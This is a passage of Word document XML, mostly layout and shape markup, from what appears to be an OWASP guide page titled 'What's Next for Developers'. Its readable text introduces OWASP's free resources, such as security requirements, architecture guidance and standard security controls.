            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="86"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>and</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30030DC2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
      </w:pPr>
      <w:hyperlink r:id="rId689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Forwards</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0033A459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5617" w:space="0"/>
            <w:col w:w="5183" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="583487C7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="17"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="7249C5E4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="479"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="33C6F7B3">
          <v:shape id="imagerId690" o:spid="_x0000_s2244" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:122pt;height:96pt;z-index:-251730432;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId690" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7319574E">
          <v:shape id="imagerId691" o:spid="_x0000_s2243" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:11pt;margin-top:231pt;width:83pt;height:405pt;z-index:-251729408;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId691" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2E373DE7">
          <v:shapetype id="_x0000_m2242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84E966B">
          <v:shape id="_x0000_s2241" type="#_x0000_m2242" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25175193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19ED55FF">
          <v:shapetype id="_x0000_m2240" coordsize="54000,3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108EA48">
          <v:shape id="_x0000_s2239" type="#_x0000_m2240" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:90pt;width:540pt;height:30pt;z-index:-251750912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0E10B369">
          <v:shapetype id="_x0000_m2238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BF8229">
          <v:shape id="_x0000_s2237" type="#_x0000_m2238" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:119.5pt;width:541pt;height:1pt;z-index:25169971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AF12F85">
          <v:shapetype id="_x0000_m2236" coordsize="200,63174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B8C5E1">
          <v:shape id="_x0000_s2235" type="#_x0000_m2236" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:89pt;width:2pt;height:631.7pt;z-index:25170073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88C03EF">
          <v:shapetype id="_x0000_m2234" coordsize="200,63174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E7FAE55">
          <v:shape id="_x0000_s2233" type="#_x0000_m2234" style="position:absolute;left:0;text-align:left;margin-left:539.5pt;margin-top:89pt;width:2pt;height:631.7pt;z-index:25170176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34FC9CC">
          <v:shapetype id="_x0000_m2232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6FD658E">
          <v:shape id="_x0000_s2231" type="#_x0000_m2232" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:89.5pt;width:541pt;height:1pt;z-index:25170278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722DFF9B">
          <v:shapetype id="_x0000_m2230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9B3C36F">
          <v:shape id="_x0000_s2229" type="#_x0000_m2230" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:719.2pt;width:541pt;height:1pt;z-index:25170380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305D6958">
          <v:shapetype id="polygon85" o:spid="_x0000_m2228" coordsize="44161,6087" o:spt="100" adj="0,,0" path="m44161,1015l44161,1015,44161,5073c44161,5073,44157,5156,44147,5237,44131,5317,44109,5394,44081,5468,44047,5539,44008,5607,43965,5672,43916,5733,43863,5790,43806,5843,43745,5891,43680,5935,43612,5974,43540,6007,43466,6035,43389,6058,43310,6074,43229,6084,43146,6087l43146,6087,,6087,,6087,,6087,,6087,,,,,,,,,43146,0c43146,,43229,3,43310,13,43389,29,43466,52,43540,80,43612,113,43680,152,43745,196,43806,244,43863,297,43916,354,43965,415,44008,480,44047,548,44081,620,44109,694,44131,771,44147,850,44157,932,44161,1015e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0A9F1DA7">
          <v:shape id="WS_polygon85" o:spid="_x0000_s2227" type="#polygon85" style="position:absolute;left:0;text-align:left;margin-left:89.2pt;margin-top:241.75pt;width:441.6pt;height:60.85pt;z-index:-251749888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15414A7D">
          <v:shapetype id="polygon86" o:spid="_x0000_m2226" coordsize="44261,6187" o:spt="100" adj="0,,0" path="m44211,1065l44211,1065,44211,5123c44211,5123,44207,5206,44197,5287,44181,5367,44159,5444,44131,5518,44097,5589,44058,5657,44015,5722,43966,5783,43913,5840,43856,5893,43795,5941,43730,5985,43662,6024,43590,6057,43516,6085,43439,6108,43360,6124,43279,6134,43196,6137l43196,6137,50,6137,50,6137,50,6137,50,6137,50,50,50,50,50,50,50,50,43196,50c43196,50,43279,53,43360,63,43439,79,43516,102,43590,130,43662,163,43730,202,43795,246,43856,294,43913,347,43966,404,44015,465,44058,530,44097,598,44131,670,44159,744,44181,821,44197,900,44207,982,44211,1065e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="04D36771">
          <v:shape id="WS_polygon86" o:spid="_x0000_s2225" type="#polygon86" style="position:absolute;left:0;text-align:left;margin-left:88.7pt;margin-top:241.25pt;width:442.6pt;height:61.85pt;z-index:-251748864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3D341F36">
          <v:shapetype id="polygon95" o:spid="_x0000_m2224" coordsize="1976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9E2732">
          <v:shape id="WS_polygon95" o:spid="_x0000_s2223" type="#polygon95" style="position:absolute;left:0;text-align:left;margin-left:280.3pt;margin-top:270.65pt;width:197.6pt;height:.6pt;z-index:-25174784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5527511">
          <v:shapetype id="_x0000_m2222" coordsize="165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761E717">
          <v:shape id="_x0000_s2221" type="#_x0000_m2222" style="position:absolute;left:0;text-align:left;margin-left:124.55pt;margin-top:292.25pt;width:165pt;height:.6pt;z-index:-25174681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1EB35FF">
          <v:shapetype id="polygon107" o:spid="_x0000_m2220" coordsize="44161,6087" o:spt="100" adj="0,,0" path="m44161,1015l44161,1015,44161,5073c44161,5073,44157,5156,44147,5237,44131,5317,44109,5393,44081,5468,44047,5539,44008,5607,43965,5672,43916,5733,43863,5790,43806,5843,43745,5891,43680,5935,43612,5974,43540,6007,43466,6035,43389,6058,43310,6074,43229,6084,43146,6087l43146,6087,,6087,,6087,,6087,,6087,,,,,,,,,43146,0c43146,,43229,3,43310,13,43389,30,43466,52,43540,80,43612,113,43680,152,43745,196,43806,245,43863,298,43916,355,43965,416,44008,481,44047,549,44081,620,44109,694,44131,771,44147,850,44157,932,44161,1015e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="77834CE7">
          <v:shape id="WS_polygon107" o:spid="_x0000_s2219" type="#polygon107" style="position:absolute;left:0;text-align:left;margin-left:89.2pt;margin-top:321.65pt;width:441.6pt;height:60.85pt;z-index:-251745792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032A2EE3">
          <v:shapetype id="polygon108" o:spid="_x0000_m2218" coordsize="44261,6187" o:spt="100" adj="0,,0" path="m44211,1065l44211,1065,44211,5123c44211,5123,44207,5206,44197,5287,44181,5367,44159,5443,44131,5518,44097,5589,44058,5657,44015,5722,43966,5783,43913,5840,43856,5893,43795,5941,43730,5985,43662,6024,43590,6057,43516,6085,43439,6108,43360,6124,43279,6134,43196,6137l43196,6137,50,6137,50,6137,50,6137,50,6137,50,50,50,50,50,50,50,50,43196,50c43196,50,43279,53,43360,63,43439,80,43516,102,43590,130,43662,163,43730,202,43795,246,43856,295,43913,348,43966,405,44015,466,44058,531,44097,599,44131,670,44159,744,44181,821,44197,900,44207,982,44211,1065e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="04555C69">
          <v:shape id="WS_polygon108" o:spid="_x0000_s2217" type="#polygon108" style="position:absolute;left:0;text-align:left;margin-left:88.7pt;margin-top:321.15pt;width:442.6pt;height:61.85pt;z-index:-251744768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59C6E67C">
          <v:shapetype id="_x0000_m2216" coordsize="1077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E8518AD">
          <v:shape id="_x0000_s2215" type="#_x0000_m2216" style="position:absolute;left:0;text-align:left;margin-left:318.95pt;margin-top:350.55pt;width:107.75pt;height:.6pt;z-index:-25174374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3107626">
          <v:shapetype id="_x0000_m2214" coordsize="44161,6086" o:spt="100" adj="0,,0" path="m44161,1014l44161,1014,44161,5072c44161,5072,44157,5155,44147,5236,44131,5316,44109,5392,44081,5467,44047,5538,44008,5606,43965,5671,43916,5732,43863,5789,43806,5842,43745,5890,43680,5934,43612,5973,43540,6006,43466,6034,43389,6057,43310,6073,43229,6083,43146,6086l43146,6086,,6086,,6086,,6086,,6086,,,,,,,,,43146,0c43146,,43229,3,43310,13,43389,29,43466,52,43540,80,43612,113,43680,152,43745,196,43806,244,43863,297,43916,354,43965,415,44008,480,44047,548,44081,619,44109,694,44131,770,44147,850,44157,931,44161,1014e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="79914659">
          <v:shape id="_x0000_s2213" type="#_x0000_m2214" style="position:absolute;left:0;text-align:left;margin-left:89.2pt;margin-top:401.55pt;width:441.6pt;height:60.85pt;z-index:-251742720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5544CD86">
          <v:shapetype id="_x0000_m2212" coordsize="44261,6186" o:spt="100" adj="0,,0" path="m44211,1064l44211,1064,44211,5122c44211,5122,44207,5205,44197,5286,44181,5366,44159,5442,44131,5517,44097,5588,44058,5656,44015,5721,43966,5782,43913,5839,43856,5892,43795,5940,43730,5984,43662,6023,43590,6056,43516,6084,43439,6107,43360,6123,43279,6133,43196,6136l43196,6136,50,6136,50,6136,50,6136,50,6136,50,50,50,50,50,50,50,50,43196,50c43196,50,43279,53,43360,63,43439,79,43516,102,43590,130,43662,163,43730,202,43795,246,43856,294,43913,347,43966,404,44015,465,44058,530,44097,598,44131,669,44159,744,44181,820,44197,900,44207,981,44211,1064e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4B8D7DFF">
          <v:shape id="_x0000_s2211" type="#_x0000_m2212" style="position:absolute;left:0;text-align:left;margin-left:88.7pt;margin-top:401.05pt;width:442.6pt;height:61.85pt;z-index:-251741696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0E278432">
          <v:shapetype id="_x0000_m2210" coordsize="1880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D071C80">
          <v:shape id="_x0000_s2209" type="#_x0000_m2210" style="position:absolute;left:0;text-align:left;margin-left:108.7pt;margin-top:435.8pt;width:188pt;height:.6pt;z-index:-25174067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4DD2607">
          <v:shapetype id="polygon162" o:spid="_x0000_m2208" coordsize="44161,6087" o:spt="100" adj="0,,0" path="m44161,1014l44161,1014,44161,5072c44161,5072,44157,5155,44147,5236,44131,5316,44109,5393,44081,5467,44047,5538,44008,5606,43965,5671,43916,5732,43863,5789,43806,5842,43745,5891,43680,5935,43612,5974,43540,6007,43466,6035,43389,6057,43310,6074,43229,6084,43146,6087l43146,6087,,6087,,6087,,6087,,6087,,,,,,,,,43146,0c43146,,43229,3,43310,13,43389,29,43466,52,43540,80,43612,113,43680,152,43745,196,43806,244,43863,297,43916,354,43965,415,44008,480,44047,548,44081,619,44109,694,44131,770,44147,850,44157,931,44161,1014e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2308B7FB">
          <v:shape id="WS_polygon162" o:spid="_x0000_s2207" type="#polygon162" style="position:absolute;left:0;text-align:left;margin-left:89.2pt;margin-top:481.45pt;width:441.6pt;height:60.85pt;z-index:-251739648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2086DF11">
          <v:shapetype id="polygon163" o:spid="_x0000_m2206" coordsize="44261,6187" o:spt="100" adj="0,,0" path="m44211,1064l44211,1064,44211,5122c44211,5122,44207,5205,44197,5286,44181,5366,44159,5443,44131,5517,44097,5588,44058,5656,44015,5721,43966,5782,43913,5839,43856,5892,43795,5941,43730,5985,43662,6024,43590,6057,43516,6085,43439,6107,43360,6124,43279,6134,43196,6137l43196,6137,50,6137,50,6137,50,6137,50,6137,50,50,50,50,50,50,50,50,43196,50c43196,50,43279,53,43360,63,43439,79,43516,102,43590,130,43662,163,43730,202,43795,246,43856,294,43913,347,43966,404,44015,465,44058,530,44097,598,44131,669,44159,744,44181,820,44197,900,44207,981,44211,1064e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="71286291">
          <v:shape id="WS_polygon163" o:spid="_x0000_s2205" type="#polygon163" style="position:absolute;left:0;text-align:left;margin-left:88.7pt;margin-top:480.95pt;width:442.6pt;height:61.85pt;z-index:-251738624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355A5B3F">
          <v:shapetype id="polygon169" o:spid="_x0000_m2204" coordsize="215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66B626A">
          <v:shape id="WS_polygon169" o:spid="_x0000_s2203" type="#polygon169" style="position:absolute;left:0;text-align:left;margin-left:180.2pt;margin-top:510.3pt;width:215.5pt;height:.6pt;z-index:-2517376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0AB773E">
          <v:shapetype id="_x0000_m2202" coordsize="44161,6087" o:spt="100" adj="0,,0" path="m44161,1014l44161,1014,44161,5072c44161,5072,44157,5155,44147,5237,44131,5316,44109,5393,44081,5467,44047,5539,44008,5607,43965,5672,43916,5733,43863,5790,43806,5843,43745,5891,43680,5935,43612,5974,43540,6007,43466,6035,43389,6057,43310,6073,43229,6083,43146,6087l43146,6087,,6087,,6087,,6087,,6087,,,,,,,,,43146,0c43146,,43229,3,43310,13,43389,29,43466,52,43540,80,43612,113,43680,152,43745,196,43806,244,43863,297,43916,354,43965,415,44008,480,44047,548,44081,619,44109,694,44131,770,44147,850,44157,931,44161,1014e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0D0A4D3C">
          <v:shape id="_x0000_s2201" type="#_x0000_m2202" style="position:absolute;left:0;text-align:left;margin-left:89.2pt;margin-top:561.35pt;width:441.6pt;height:60.85pt;z-index:-251736576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5F41A3C1">
          <v:shapetype id="_x0000_m2200" coordsize="44261,6187" o:spt="100" adj="0,,0" path="m44211,1064l44211,1064,44211,5122c44211,5122,44207,5205,44197,5287,44181,5366,44159,5443,44131,5517,44097,5589,44058,5657,44015,5722,43966,5783,43913,5840,43856,5893,43795,5941,43730,5985,43662,6024,43590,6057,43516,6085,43439,6107,43360,6123,43279,6133,43196,6137l43196,6137,50,6137,50,6137,50,6137,50,6137,50,50,50,50,50,50,50,50,43196,50c43196,50,43279,53,43360,63,43439,79,43516,102,43590,130,43662,163,43730,202,43795,246,43856,294,43913,347,43966,404,44015,465,44058,530,44097,598,44131,669,44159,744,44181,820,44197,900,44207,981,44211,1064e">
            <v:stroke joinstyle="miter"/>
            <v:formulas/>
            <v:path o:connecttype="segments"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7433FC5A">
          <v:shape id="_x0000_s2199" type="#_x0000_m2200" style="position:absolute;left:0;text-align:left;margin-left:88.7pt;margin-top:560.85pt;width:442.6pt;height:61.85pt;z-index:-251735552;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#d0d8cf" strokeweight="1pt">
            <v:fill opacity="0"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0964EF5A">
          <v:shapetype id="polygon184" o:spid="_x0000_m2198" coordsize="1047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03EFD7B">
          <v:shape id="WS_polygon184" o:spid="_x0000_s2197" type="#polygon184" style="position:absolute;left:0;text-align:left;margin-left:126.1pt;margin-top:574pt;width:104.75pt;height:.55pt;z-index:-25173452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B8F0A7D">
          <v:shapetype id="polygon189" o:spid="_x0000_m2196" coordsize="1387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99216BC">
          <v:shape id="WS_polygon189" o:spid="_x0000_s2195" type="#polygon189" style="position:absolute;left:0;text-align:left;margin-left:317.5pt;margin-top:584.8pt;width:138.7pt;height:.55pt;z-index:-25173350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47EEA6D">
          <v:shapetype id="polygon204" o:spid="_x0000_m2194" coordsize="1120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3F434C3">
          <v:shape id="WS_polygon204" o:spid="_x0000_s2193" type="#polygon204" style="position:absolute;left:0;text-align:left;margin-left:308.25pt;margin-top:606.4pt;width:112.05pt;height:.6pt;z-index:-25173248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A98F5A1">
          <v:shapetype id="polygon209" o:spid="_x0000_m2192" coordsize="1052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91404B2">
          <v:shape id="WS_polygon209" o:spid="_x0000_s2191" type="#polygon209" style="position:absolute;left:0;text-align:left;margin-left:178.3pt;margin-top:617.2pt;width:105.2pt;height:.6pt;z-index:-251731456;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#3a6331" stroked="f"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+D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1339B9EF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="479"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="289ED447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What’s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Next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for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Developers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70426216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3DB9CBF8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD2CB2D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C94E46" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45CC8D80" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="359" w:lineRule="exact"/>
        <w:ind w:left="144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Establish &amp; Use Repeatable Security Processes and Standard Security Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535D3893" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A5032E0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="421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Whether you are new to web application security or are already very familiar with these risks, the task of producing a secure web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BC7C30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application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this can be daunting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F51BD9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="243A2894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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663379F3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numerous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> free and open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> resources that you can use to address application security in your organization. The following are some</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDA445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of the many resources OWASP has produced to help organizations produce secure web applications. On the next page, we</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D322C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present additional OWASP resources that can assist organizations in verifying the security of their applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FA9708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1C80C79B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1376338B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A411BF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09499359" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="224" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="11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pplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A67155" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="25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Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A56A5F8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
        <w:ind w:left="458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Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0929D7A4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25425910" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5F9446" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C83CFC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD87D9D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="206" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="11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pplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E57E9B8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="25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Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE1115" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="67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rchitecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D23948" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="67"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00EC5328" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="67"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="053ECA66" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="67"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54E76C9E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="67"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D3ECC43" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="206" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="206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Standard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2EFF47" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="25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Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0437F0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="235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Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE2B074" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="235"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269829CF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="235"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3688B19B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="235"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3512651F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="235"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DBE19A0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
